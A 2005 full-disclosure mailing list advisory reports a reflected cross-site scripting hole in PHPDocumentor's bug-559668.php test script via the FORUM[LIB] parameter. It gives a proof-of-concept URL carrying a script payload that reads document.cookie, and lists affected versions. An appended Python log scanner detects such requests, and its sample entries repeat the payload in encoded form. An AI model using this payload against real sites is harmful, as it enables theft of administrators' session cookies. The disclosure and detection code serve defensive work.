List:       full-disclosure
Subject:    [Full-disclosure] PHPDocumentor Cross-Site Scripting
From:       zeus olimpusklan <zeus.olimpusklan () gmail ! com>
Date:       2005-12-31 4:06:49
Message-ID: 558f59870512302006t134cde5ds4d1abbe85a24cc1a () mail ! gmail ! com

###########################################################################
# Advisory #3 Title: PHPDocumentor Cross-Site Scripting
#
#
# Author: 0o_zeus_o0
# Contact: zeus@diosdelared.com
# Website: olimpusklan.org
# Date: 30/12/2005
# Risk: High
# Vendor Url: http://www.phpdoc.org/
# Affected Software: PHPDocumentor
# Non Affected:
#
# We Are:olimpus klan team
#
#TECHNICAL INFO
#================================================================
#bug allows theft of the administrator's cookies
#
#
#
#Example:
#
#http://example.com/[path]/Documentation/tests/bug-559668.php?FORUM[LIB]=[XSS]
#
#http://example.com/[path]/Documentation/tests/bug-559668.php?FORUM[LIB]=<script>alert(document.cookie)</script>
#
#
#
#
#
#VULNERABLE VERSIONS
#================================================================
# All
#1.3 RC4
#1.3 RC3
#1.2.3
#1.2.2
#1.2.1
#1.2
#
#================================================================
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.EliteMexico.Org
#================================================================
#greetz: lady fire, fraude, adi, xoxo ,El_mesias, pandora, mbyte,Rigter
##############################################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
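
Added example, not part of the original advisory: a log check a site operator could run to find requests that reached the test script named above and carried markup in the FORUM[LIB] parameter. The access-log format (Apache common/combined), the /doc/ prefix and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Path and parameter come from the advisory; the log format is an assumption.
TARGET_SUFFIX = "/Documentation/tests/bug-559668.php"
TARGET_PARAM = "FORUM[LIB]"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"[<>\"']")  # characters that break out of HTML context

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Dec/2005:04:10:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [31/Dec/2005:04:11:00 +0000] "GET /doc/Documentation/tests/bug-559668.php?FORUM[LIB]=lib HTTP/1.1" 200 300',
    '198.51.100.7 - - [31/Dec/2005:04:12:00 +0000] "GET /doc/Documentation/tests/bug-559668.php?FORUM%5BLIB%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 340',
    '198.51.100.7 - - [31/Dec/2005:04:13:00 +0000] "GET /doc/Documentation/tests/bug-559668.php?FORUM%5BLIB%5D=%253Cscript%253E HTTP/1.1" 200 320',
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return None if the entry does not hit the script, else a verdict dict."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not unquote(parts.path).endswith(TARGET_SUFFIX):
        return None
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if fully_decode(k) == TARGET_PARAM]
    markup = any(MARKUP_RE.search(fully_decode(v)) for v in values)
    return {"path": parts.path, "param_seen": bool(values), "markup": markup}


def scan(lines):
    """Return (line_number, verdict) for every entry that reached the script."""
    checked = ((n, inspect_line(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in checked if v]


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

Any hit at all shows the Documentation/tests directory is reachable from the web; entries with markup set to True are the ones to review first.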
